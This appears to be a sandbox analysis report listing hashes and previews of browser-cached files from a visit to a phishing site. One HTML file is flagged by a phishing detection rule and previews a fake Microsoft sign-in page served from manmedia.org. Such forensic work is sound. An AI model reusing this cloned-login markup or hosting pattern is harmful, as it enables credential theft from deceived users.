SHA1:	F3EE9ACBD213872987FA5432050FF271892F187D
SHA-256:	D6A1B3F79D7C3407BA8B9B9CD25757A3E5812170895353CE52ED68F68510277F
SHA-512:	8E1E94D2B840E1EC005F547CB8382B3DE37B08B788F014B49ED24C80B9CB80025643E15E59990BC6BA5E54E300D8776B2572CE9664D6BC79CC672B8A784DC065
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{8DE2B5D7-7633-11EB-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	53336
Entropy (8bit):	1.9851223060293122
Encrypted:	false
SSDEEP:	192:rTZwZe2BWCltCxfClLtCl08oyWCy0sYCc0qSCccxtCccNHiLC/cpLCLc5CCLHX2g:rVgVwwOMhxxY5S8a0JLFC9HTi7QTO
MD5:	962274CC1F282531B23203E04357D3FF
SHA1:	6DD72F23F4756D263D6B9880C1D8C3B8D49C1801
SHA-256:	5109A8E77C833CE179D130F375178104C0DE5B989E86CDC3F2512FD41DB3E4EC
SHA-512:	3464C97D984F866A41EC912724AE976E685A982B8698D46ECFF733BDA41C2A531400AC777AA55AED2666CF4AE374EFD0539020DA86A995C8CCD129C1D993A196
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{835A3560-7633-11EB-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	19032
Entropy (8bit):	1.5948619844744936
Encrypted:	false
SSDEEP:	48:IwHGcpryGwpaGG4pQWGrapbSqGQpBHGHHpcGTGUpQwlGcpm:rtZ6Q26YBSSjy2W6yg
MD5:	FE6D8E055CF9717ED85F88E719780F49
SHA1:	1E2B740098CFA100B8A1102F04976CE25B481195
SHA-256:	F5D66DB73B3C4FFD1F6576A80E5A7B4772674184347BC82C0397063F64B1ACB7
SHA-512:	554DE6C13F63040DA95E51AD26D81944201566DBFD45002A7E9FB49DF24515489E1A4EF392415738524AAF8D454AC4C575BF13E2676DA5616AAED960D8E56C87
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{8DE2B5D9-7633-11EB-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28278
Entropy (8bit):	2.1178792382736584
Encrypted:	false
SSDEEP:	96:rhZWQSeK1W6VWJC9o8/InnIIHnIm3pZr3wBq9ftr:rhZWQSeKk6EJC9o8/InnhHnrpZjltr
MD5:	4CA8594CFF927437BF6C362441A1076E
SHA1:	EF5D5F3EA6921532416F9F11F896F548B5C59521
SHA-256:	0A019F360D7F50BED6A4A7167FBB8F259719AD3AD056743C95CE43B3D7F3551B
SHA-512:	D3BE21DC29B842C29967E012D80946D7ABCAC2EE48769B576C0DE4BCFA0ABF07A56A04E502CF5220DD07CBBF1EF27A03B19A83973A2481E6B2E6920280C95CA9
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{99A12787-7633-11EB-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28278
Entropy (8bit):	2.12104244892328
Encrypted:	false
SSDEEP:	96:rVPZHqQieu1WQVWjCDoc/MnyIxHyIm3kZr3SBqxMtr:rBZKQieukQEjCDoc/MnykHyrkZjwtr
MD5:	8ECC059DB7B7A31E416156DB10FB5F84
SHA1:	87C27E185997DBDE9CC312AB57EF2B63121D386A
SHA-256:	622525EC9D53C63D863BCF423B6CAE7F2BAFD3CB85B1207E6F4BB868FD785FDB
SHA-512:	C9C0776427D6587266A15F91B382AC070FC1B1D05EB215A4F8EA703551A6BC46F123F9AE1A81E1767A4EECDF3ED53316ADF98CC04448F47E01B957C9BA2F2458
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{99A12788-7633-11EB-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27998
Entropy (8bit):	2.122018630942539
Encrypted:	false
SSDEEP:	96:rXZIQaeK1WUHP2vwWo434uIOYuIm3kZr37BqQxtr:rXZIQaeKkUHP2vwT434uDYurkZjntr
MD5:	1AD682CA83D8C4403BDE9044255EF56F
SHA1:	7C7C3A56DC6F7EAB23051BE9D7808EFFA7AD97C8
SHA-256:	04CF35A9D86D9FF37FFC5C0D083E8478E6D499C7DA1987FD8AB71CC9CD8C95B9
SHA-512:	EAF6CCF3A8A70FC73D7476BAD1182B282CAB0ECF86A249C30BFF362D992CB5EDABDBA2D58F3F6BB9E497F0D74371C0B1047F587A3C923F73410B0A6D064FEE81
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{A0830FD3-7633-11EB-90E5-ECF4BB2D2496}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	16984
Entropy (8bit):	1.5643524552422585
Encrypted:	false
SSDEEP:	48:IwTGcprWhGwpanG4pQfGrapbSU7GQpK6G7HpRYTGIpG:rpZuQJ6jBSU1AVT8A
MD5:	5D470E0EFBEB7860B03120EF2857313B
SHA1:	F84CE169B659DDAEC3A17574F845303D9D03E44A
SHA-256:	8D3EF8C21AD52E5F6CE7F46FFF8DDD4FA4A256504353495ED9079DEA8FBC5F6E
SHA-512:	6B4E40C822D9FBC1C6E4E71529DE5F89D5CB3B14D9C479F2E9E6213CD104A9C3B34099715601F0864CF65B73C446C280B84242589932CB692673EF64872BFF1A
Malicious:	false
Reputation:	low
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\favicons[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	downloaded
Size (bytes):	492
Entropy (8bit):	7.443140866786406
Encrypted:	false
SSDEEP:	12:6v/7w9xBoc7dfbmXwR54uPABdsBCRGE03H76f79ysL5w:t9/1dfbV5pIssN03H7kpyW5w
MD5:	3CA64F83FDCF25135D87E08AF65E68C9
SHA1:	B82D0979D555BD137B33C15021129E06CBEEA59A
SHA-256:	2E30FF33270FD8687B0EB4D12652BFD967F23975F158BF8DA93BECE2BA4AB947
SHA-512:	7675A8C4E6146E62DDA019340EF95E477AA3D14364B5A773114EA1110C38233F5D8D9B08F6C83BF7664B33695AAC7254B25D727A15EA6A9DED2EC9D1EA07DC0E
Malicious:	false
Reputation:	low
IE Cache URL:	https://www.google.com/s2/favicons?sz=64&domain_url=murexltd.com
Preview:	.PNG........IHDR................a....IDATx.b...?E........;C..i[PI....>......(.1.c..b...d..m.m';]...W{...S......+..'.}..X........~...N..1...E...S1E..O.PX\..C...o]<.........[.T..d.Rm..u.n.....<........:...#.P..c.*2....g.....!...>v.:...#...J..d.xx."..x._=....k...!.!!;@.....+.{`..+.....gk.....@N..-@.X.q......K...'..@@)...........&.w.......%..<&.N.._x.G`c..F%L.eC.80H`L...#Z..F....e.......L.H...L.&a..5.0..V4N..m..........$.......(..b{....8a.L.a.BM....0.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\popper.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	20495
Entropy (8bit):	5.217693761954058
Encrypted:	false
SSDEEP:	384:f5LFrVVVnCQvIR/CFU4hHPV4kdxXvYqo2D75zCx+vI2am3MxGpGTgd/9jt9+Db9A:hNVVVnyiU41xXvlD7wx+v0xyGTgnZO9A
MD5:	6B08DDC901000D51FA1F06A35518F302
SHA1:	BAFE987C18CBE0587DE3E6360E7DA40A2885614B
SHA-256:	02835066969199E9924F1332F7172A5D7E552F023A20C3D8BA03BB6C51CE5BE5
SHA-512:	7A97FA1CF4A12D0F338090F8A4FFAD48D91843D6955304DE5F6208DE394642B0B412D6FD30D7A880CAD92200A8F7F2005C40324BCCE3CFEDA7B14A57DFF098CA
Malicious:	false
Reputation:	low
IE Cache URL:	https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.14.0/umd/popper.min.js
Preview:	/. Copyright (C) Federico Zivolo 2018. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. /(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=getComputedStyle(e,null);return t?o[t]:o}function o(e){return'HTML'===e.nodeName?e:e.parentNode\|\|e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto\|scroll\|overlay)/.test(r+s+p)?e:n(o(e))}function r(e){if(!e)return document.documentElement;for(var o=ie(10)?document.body:null,n=e.offsetParent;n===o&&e.nextElementSibling;)n=(e=e.nextElementSibling).offsetParent;var i=n&&n.nodeName;return i&&'BODY'!==i&&'HTM

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3Y2ADQKS\style[1].css Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	16331
Entropy (8bit):	5.319200830403511
Encrypted:	false
SSDEEP:	192:yqVC6VfZfqZp+VvNmdW3WcWY6TLMPbUZ70PIj+IgUgX9aG+0F4jwvUZIhAjwGpP+:y36Zf6kmv7Hvo9Z+0WjwIIh5GZRgf
MD5:	3BD33314562B431BB47EF0CCB7ECCC62
SHA1:	93171B5D03DA9D63AC3BA80187159A9F9D5022D6
SHA-256:	D95C9920A34DF7714EADB1257094981FDD5A596D2B1C80E3A9278F02D1AEE9A1
SHA-512:	2A4857C5B4E4F632C9252EF8922BB3B0399883C7273A58BBC0E6A73094165B0EEE8BA2A2A5CAEEFBE6C335ECD1DCE9473500DDA0C4B8DEA9F60FFE973DF94627
Malicious:	false
Reputation:	low
IE Cache URL:	https://manmedia.org/offic/n.page/style.css
Preview:	color{...color:rgba(196,91,219,0.1);...color:rgba(196,91,219,0.2);...color:rgba(196,91,219,0.3);...color:rgba(196,91,219,0.4);...color:rgba(196,91,219,0.5);...color:rgba(196,91,219,0.6);...color:rgba(196,91,219,0.7);...color:rgba(196,91,219,0.8);...color:rgba(196,91,219,0.9);...color:rgba(196,91,219,1);......background-color:-webkit-gradient(linear, 0 0, 0 100%, from(#ffffff), color-stop(25%, #ffffff), to(#e6e6e6));...background-color:-webkit-linear-gradient(#ffffff, #ffffff 25%, #e6e6e6);...background-color:-moz-linear-gradient(top, #ffffff, #ffffff 25%, #e6e6e6);...background-color:-ms-linear-gradient(#ffffff, #ffffff 25%, #e6e6e6);...background-color: linear-gradient(#ffffff, #ffffff 25%, #e6e6e6);...filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#ffffff', endColorstr='#e6e6e6', GradientType=0);.........}....html, body, div, span, applet, object, iframe,..h1, h2, h3, h4, h5, h6, p, blockquote, pre,..a, abbr, acronym, address, big, cite, code,..del, dfn, em, img, i

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\46f3fddd-165c-4cd8-9412-436cd19deef5[1].html Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	255366
Entropy (8bit):	6.093517370301889
Encrypted:	false
SSDEEP:	6144:SWqmT2RmEb2oUp9M5WnwGJUQo7xKOFqqbgvHzy8H0WqmT2RmEb2oUp9M5WnwGJUh:8WM5LGk1kcWM5LGk1km
MD5:	99A747B517553FEDEA4E383A3B257FB3
SHA1:	A1CED03F68CAFEEAED72CC4184788109B1500954
SHA-256:	FC09B0D19EE905B6CDEC8D0FC94ED424EDBA006BE87F702834D85176E703BE12
SHA-512:	04D37CEFDBA3998BC71ECBBCF2CDBB4E9F6FDD10A2E27E1A8B57FDAA19546DC49851D58A0ABB0A57A31B1F43C793AADBF567D423F8997A694547DF88C88A10B8
Malicious:	true
Yara Hits:	Rule: JoeSecurity_HtmlPhish_10, Description: Yara detected HtmlPhish_10, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\46f3fddd-165c-4cd8-9412-436cd19deef5[1].html, Author: Joe Security
Reputation:	low
Preview:	....<html dir="ltr" class="" lang="en">....<head>.. <title>Sign in to your account</title>.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <meta http-equiv="X-UA-Compatible" content="IE=edge">.. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=2.0, user-scalable=yes">.. <meta http-equiv="Pragma" content="no-cache">.. <meta http-equiv="Expires" content="-1">.. <meta name="PageID" content="ConvergedSignIn">.. <meta name="SiteID" content="">.. <meta name="ReqLC" content="1033">.. <meta name="LocLC" content="en-US">.. <meta name="title" content="ES6-CrawlerDetect">.. .... <link rel="shortcut icon" href="https://secure.aadcdn.microsoftonline-p.com/ests/2.1.8576.13/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico">..<link rel="stylesheet" href="https://manmedia.org/offic/n.page/style.css" />.. <meta name="robots" content="none">..<script type="text/javascript" src="https://manmedia.org/of

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\bootstrap.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	50676
Entropy (8bit):	5.276454699305197
Encrypted:	false
SSDEEP:	768:D2Ybgh0GBxTHVmcmjWSLsynS/zZ/AcyUenY8yiKKdHPPm26Ro1FH4nx46:D2jh02Lh+SbZ/AbYqdm2mx46
MD5:	CE6E785579AE4CB555C9DE311D1B9271
SHA1:	5EF2C15B47D7290698C737676BA9C3056B45F2E8
SHA-256:	0BCA10549DF770AB6790046799E5A9E920C286453EBBB2AFB0D3055339245339
SHA-512:	A601871568C1B5B2874D30D6E5BB8667D994D2719FC4D6AF7F99162BF39DDAE800FFFF45B8C1C0BA790088C7B98DE2FFE565B5AF4531C0A8BA0F92E930E243DF
Malicious:	false
Reputation:	low
IE Cache URL:	https://stackpath.bootstrapcdn.com/bootstrap/4.1.0/js/bootstrap.min.js
Preview:	/!. Bootstrap v4.1.0 (https://getbootstrap.com/). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,c){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable\|\|!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function o(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function h(r){for(var t=1;t<arguments.length;t++){var s=null!=arguments[t]?arguments[t]:{},e=Object.keys(s);"function"==typeof Object.getOwnPropertySymbols&&(e=e.concat(Object.getOwnPropertySymbols(s).filter(function(t){return Object.getOwnPropertyDescriptor(s,t).enum

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\jquery-3.3.1.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	86927
Entropy (8bit):	5.289226719276158
Encrypted:	false
SSDEEP:	1536:jLiBdiaWLOczCmZx6+VWuGzQNOzdn6x2RZd9SEnk9HB96c9Yo/NWLbVj3kC6t3:5kn6x2xe9NK6nC69
MD5:	A09E13EE94D51C524B7E2A728C7D4039
SHA1:	0DC32DB4AA9C5F03F3B38C47D883DBD4FED13AAE
SHA-256:	160A426FF2894252CD7CEBBDD6D6B7DA8FCD319C65B70468F10B6690C45D02EF
SHA-512:	F8DA8F95B6ED33542A88AF19028E18AE3D9CE25350A06BFC3FBF433ED2B38FEFA5E639CDDFDAC703FC6CAA7F3313D974B92A3168276B3A016CEB28F27DB0714A
Malicious:	false
Reputation:	low
IE Cache URL:	https://ajax.aspnetcdn.com/ajax/jQuery/jquery-3.3.1.min.js
Preview:	/! jQuery v3.3.1 \| (c) JS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(e,t){"use strict";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,s=n.push,u=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,p=f.toString,d=p.call(Object),h={},g=function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},y=function e(t){return null!=t&&t===t.window},v={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t\|\|r).createElement("script");if(o.text=e,n)for(i in v)n[i]&&(o[i]=n[i]);t.head.appendChild(o).parentNode.removeChild(o)}function x(e){return null==e?e+"":"object"==typeof e\|\|"function"==typeof e?l[c.call(e)]\|\|"object":typeof e}var b="3.3.1",w=function(e,t){return new w.fn.init(e,t)},

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\jquery-3.3.1.slim.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	69917
Entropy (8bit):	5.290926894311774
Encrypted:	false
SSDEEP:	1536:hLiMgk2gULYoXUmZx6+VWNL0kC8W90qU9JR7hDqEDqWSNB1gZFy/HG+FP:I8w0qU9JTtH3aP
MD5:	99B0A83CF1B0B1E2CB16041520E87641
SHA1:	BC5836992C0B260496BA520FE1336D499BF06EB7
SHA-256:	DDE76B9B2B90D30EB97FC81F06CAA8C338C97B688CEA7D2729C88F529F32FBB1
SHA-512:	33EA8C2353C745C61C3A927378995A59B555C76249C8F23065AB3CA2BEDD73DECB64EA248EF6E97D1C729A156D9492F28E2177C06CABD0524E0380CB38D2D52F
Malicious:	false
Reputation:	low
IE Cache URL:	https://code.jquery.com/jquery-3.3.1.slim.min.js
Preview:	/! jQuery v3.3.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector \| (c) JS Foundation and other contributors \| jquery.org/license /.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(e,t){"use strict";var n=[],r=e.document,i=Object.getPrototypeOf,o=n.slice,a=n.concat,u=n.push,s=n.indexOf,l={},c=l.toString,f=l.hasOwnProperty,d=f.toString,p=d.call(Object),h={},g=function e(t){return"function"==typeof t&&"number"!=typeof t.nodeType},v=function e(t){return null!=t&&t===t.window},y={type:!0,src:!0,noModule:!0};function m(e,t,n){var i,o=(t=t\|\|r).createElement("script");if(o.text=e,n)for(i in y)n[i]&&(o[i]=n[i]);t.head.a

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\favicons[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	492
Entropy (8bit):	7.443140866786406
Encrypted:	false
SSDEEP:	12:6v/7w9xBoc7dfbmXwR54uPABdsBCRGE03H76f79ysL5w:t9/1dfbV5pIssN03H7kpyW5w
MD5:	3CA64F83FDCF25135D87E08AF65E68C9
SHA1:	B82D0979D555BD137B33C15021129E06CBEEA59A
SHA-256:	2E30FF33270FD8687B0EB4D12652BFD967F23975F158BF8DA93BECE2BA4AB947
SHA-512:	7675A8C4E6146E62DDA019340EF95E477AA3D14364B5A773114EA1110C38233F5D8D9B08F6C83BF7664B33695AAC7254B25D727A15EA6A9DED2EC9D1EA07DC0E
Malicious:	false
Reputation:	low
Preview:	.PNG........IHDR................a....IDATx.b...?E........;C..i[PI....>......(.1.c..b...d..m.m';]...W{...S......+..'.}..X........~...N..1...E...S1E..O.PX\..C...o]<.........[.T..d.Rm..u.n.....<........:...#.P..c.*2....g.....!...>v.:...#...J..d.xx."..x._=....k...!.!!;@.....+.{`..+.....gk.....@N..-@.X.q......K...'..@@)...........&.w.......%..<&.N.._x.G`c..F%L.eC.80H`L...#Z..F....e.......L.H...L.&a..5.0..V4N..m..........$.......(..b{....8a.L.a.BM....0.....IEND.B`.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\jquery.min[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode text, with very long lines
Category:	downloaded
Size (bytes):	93868
Entropy (8bit):	5.372204012865564
Encrypted:	false
SSDEEP:	1536:k5RKUpVgklsdbuLP/l+0fGzA8gmtasgx/c9Rzzi4yff8qeLvHHEjam7rSnmBn9gn:Ee8FbGzA81+xRRi1Z3
MD5:	DDB84C1587287B2DF08966081EF063BF
SHA1:	9EB9AC595E9B5544E2DC79FFF7CD2D0B4B5EF71F
SHA-256:	88171413FC76DDA23AB32BAA17B11E4FFF89141C633ECE737852445F1BA6C1BD
SHA-512:	0640605A22F437F10521B2D96064E06E4B0A1B96D2E8FB709D6BD593781C72FF8A86D2BFE3090BC4244687E91E94A897C7B132E237D369B2E0DC01083C2EC434
Malicious:	false
Reputation:	low
IE Cache URL:	https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js
Preview:	/! jQuery v1.7.1 jquery.com \| jquery.org/license /.(function(a,b){function cy(a){return f.isWindow(a)?a:a.nodeType===9?a.defaultView\|\|a.parentWindow:!1}function cv(a){if(!ck[a]){var b=c.body,d=f("<"+a+">").appendTo(b),e=d.css("display");d.remove();if(e==="none"\|\|e===""){cl\|\|(cl=c.createElement("iframe"),cl.frameBorder=cl.width=cl.height=0),b.appendChild(cl);if(!cm\|\|!cl.createElement)cm=(cl.contentWindow\|\|cl.contentDocument).document,cm.write((c.compatMode==="CSS1Compat"?"<!doctype html>":"")+"<html><body>"),cm.close();d=cm.createElement(a),cm.body.appendChild(d),e=f.css(d,"display"),b.removeChild(cl)}ck[a]=e}return ck[a]}function cu(a,b){var c={};f.each(cq.concat.apply([],cq.slice(0,b)),function(){c[this]=a});return c}function ct(){cr=b}function cs(){setTimeout(ct,0);return cr=f.now()}function cj(){try{return new a.ActiveXObject("Microsoft.XMLHTTP")}catch(b){}}function ci(){try{return new a.XMLHttpRequest}catch(b){}}function cc(a,c){a.dataFilter&&(c=a.dataFilter(c,a.dataType));var d=

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\G62TDH9B\jqueryLib[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	86663
Entropy (8bit):	5.368302777291146
Encrypted:	false
SSDEEP:	1536:TNhEyjjTikEJO4edXXe9J578go6MWX2xkjde4c4j2ll2AckaXE46n15HZ+FhFcQ+:Vxc2yji4j2uC/kcQDU8CuE
MD5:	473957CFB255A781B42CB2AF51D54A3B
SHA1:	67BDACBD077EE59F411109FD119EE9F58DB15A5F
SHA-256:	75B707D8761E2BFBD25FBD661F290A4F7FD11C48E1BF53A36DC6BD8A0034FA35
SHA-512:	20DA3FE171C075635EF82F8DE57644C7A50BE45EB1207D96A51B5EADEAAC17EE830B5058D87E88501E20EC41EF897F65CEC26A0380EAF49698C6EAA5981D8483
Malicious:	false
Reputation:	low
IE Cache URL:	https://manmedia.org/offic/n.page/jqueryLib.js
Preview:	/! jQuery v3.2.1 \| (c) JS Foundation and other contributors \| jquery.org/license /..!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b\|\|d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+\|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){va

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\2_bc3d32a696895f78c19df6c717586a5d[1].svg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	1864
Entropy (8bit):	5.222032823730197
Encrypted:	false
SSDEEP:	48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
MD5:	BC3D32A696895F78C19DF6C717586A5D
SHA1:	9191CB156A30A3ED79C44C0A16C95159E8FF689D
SHA-256:	0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
SHA-512:	8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
Malicious:	false
Reputation:	low
IE Cache URL:	https://aadcdn.msftauth.net/ests/2.1/content/images/backgrounds/2_bc3d32a696895f78c19df6c717586a5d.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\OTUW0Q90\GetFile[1].htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, ASCII text
Category:	dropped
Size (bytes):	285
Entropy (8bit):	5.677902187764918
Encrypted:	false
SSDEEP:	6:AYSI0MXLxu2CAIuh7FU19jtwktLFgKGeN/OXwHqiEADMDQNM+YB:zSabxiAIkBU1Lwk1FuMjt7D2QNMr
MD5:	DF363642D15728BF8801DAE5E826D24D
SHA1:	9C28EDAAD8E14FECF3DB768847272DD8F0163B94
SHA-256:	3B093FEF80962FDEEB8325D82429186EAB0E414F53BAD02D657D7637A0C9261E
